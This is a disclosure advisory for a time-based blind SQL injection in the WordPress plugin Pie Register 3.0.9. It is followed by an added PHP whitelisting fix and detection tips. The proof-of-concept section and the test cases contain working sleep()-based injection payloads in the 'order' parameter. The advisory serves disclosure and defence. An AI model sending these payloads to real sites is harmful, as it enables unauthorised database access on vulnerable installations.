# Title: WordPress Plugin Pie Register < 3.0.9 - Blind SQL Injection
# Author: Manuel García Cárdenas
# Date: 2018-05-10
# Software: WordPress Plugin Pie Register 3.0.9
# CVE: CVE-2018-10969

# I. VULNERABILITY
# WordPress Plugin Pie Register 3.0.9 - Blind SQL Injection

# II. BACKGROUND
# Pie-Register is a quick and easy way to brand your Registration Pages on
# WordPress sites.

# III. DESCRIPTION
# This bug was found by reviewing the following lines of the plugin's source:
# /pie-register/classes/invitation_code_pagination.php:if ( isset( $_GET['order'] ) && $_GET['order'] )
# /pie-register/classes/invitation_code_pagination.php:$order = $_GET['order'];
# When the query is executed, the parameter "order" is not sanitized:
# /pie-register/classes/invitation_code_pagination.php:$this->order = esc_sql( $order );
# esc_sql() only escapes characters for use inside a quoted SQL string literal; it
# gives no protection for a value that is placed unquoted into the query, as the
# sort direction of an ORDER BY clause is.

# IV. PROOF OF CONCEPT
# The following URLs have been confirmed to suffer from time-based SQL injection.
GET /wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc (original)
GET /wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(2)))a) HTTP/1.1 (2 seconds of response)
GET /wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(30)))a) HTTP/1.1 (30 seconds of response)

# V. SYSTEMS AFFECTED
# Pie Register <= 3.0.9

# VI. DISCLOSURE TIMELINE
# May 10, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas
# May 10, 2018 2: Sent to vendor without response
# June 05, 2018 3: Second email to vendor without response
# June 11, 2018 4: Sent to the Full-Disclosure lists

# VII. Solution
# Disable plugin until a fix is available
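The root cause in section III is that an ORDER BY direction cannot be made safe by escaping, and it cannot be bound as a query parameter either (neither `$wpdb->prepare()` nor MySQL placeholders accept identifiers or keywords). The only reliable control is to map the request value onto a fixed set of literals. The following PHP is an added example written for this advisory, not the plugin's own code or its vendor's fix; the function names, the allowed column list and the sample inputs are assumptions constructed for illustration.

```php
<?php
// Added example (not Pie Register's code): whitelist the ORDER BY column and
// direction instead of relying on esc_sql(), which only escapes characters
// for use inside a quoted string literal and leaves an unquoted keyword as-is.

// Vulnerable pattern as described in the advisory (shown for contrast only):
//   $order       = $_GET['order'];
//   $this->order = esc_sql( $order );   // "desc,(select ...)" survives escaping
//   $sql = "SELECT ... ORDER BY {$this->orderby} {$this->order}";

/**
 * Return a safe sort direction. Anything other than exactly "asc" or "desc"
 * (case-insensitive, surrounding whitespace ignored) falls back to $default.
 * The returned value is always one of our own literals, never request data.
 */
function pr_safe_order( $raw, $default = 'ASC' ) {
    if ( ! is_string( $raw ) ) {
        return $default;
    }
    $dir = strtoupper( trim( $raw ) );
    return in_array( $dir, array( 'ASC', 'DESC' ), true ) ? $dir : $default;
}

/**
 * Return a safe column name by exact match against an allowed list.
 * Column names cannot be parameterized, so a whitelist is the only option.
 * $allowed is an assumed list; a real plugin would use its actual columns.
 */
function pr_safe_orderby( $raw, array $allowed, $default ) {
    return ( is_string( $raw ) && in_array( $raw, $allowed, true ) ) ? $raw : $default;
}

/**
 * Build the ORDER BY fragment from a request array ($_GET in practice).
 * Both pieces are resolved to fixed literals before being interpolated.
 */
function pr_build_order_clause( array $get ) {
    $allowed_columns = array( 'id', 'name', 'code', 'created' ); // assumed column set
    $orderby = pr_safe_orderby( isset( $get['orderby'] ) ? $get['orderby'] : null,
                                $allowed_columns, 'id' );
    $order   = pr_safe_order( isset( $get['order'] ) ? $get['order'] : null );
    return "ORDER BY `{$orderby}` {$order}";
}

// Demonstration with constructed request inputs: the tampered "order" value
// from the advisory's PoC and a tampered "orderby" both collapse to defaults
// rather than reaching the query.
$cases = array(
    array( 'orderby' => 'name', 'order' => 'desc' ),
    array( 'orderby' => 'name', 'order' => 'desc,(select*from(select(sleep(2)))a)' ),
    array( 'orderby' => 'name`; -- ', 'order' => 'ASC' ),
    array(),
);
foreach ( $cases as $c ) {
    echo pr_build_order_clause( $c ), PHP_EOL;
}
```

Run it with `php example.php`. For detection while the plugin is still deployed, the same whitelist check can be applied in a WAF rule or access-log query: any `order` value for `page=pie-invitation-codes` that is not exactly `asc` or `desc` is anomalous, and the page's time-based probes also show up as requests with unusually long response times against this endpoint.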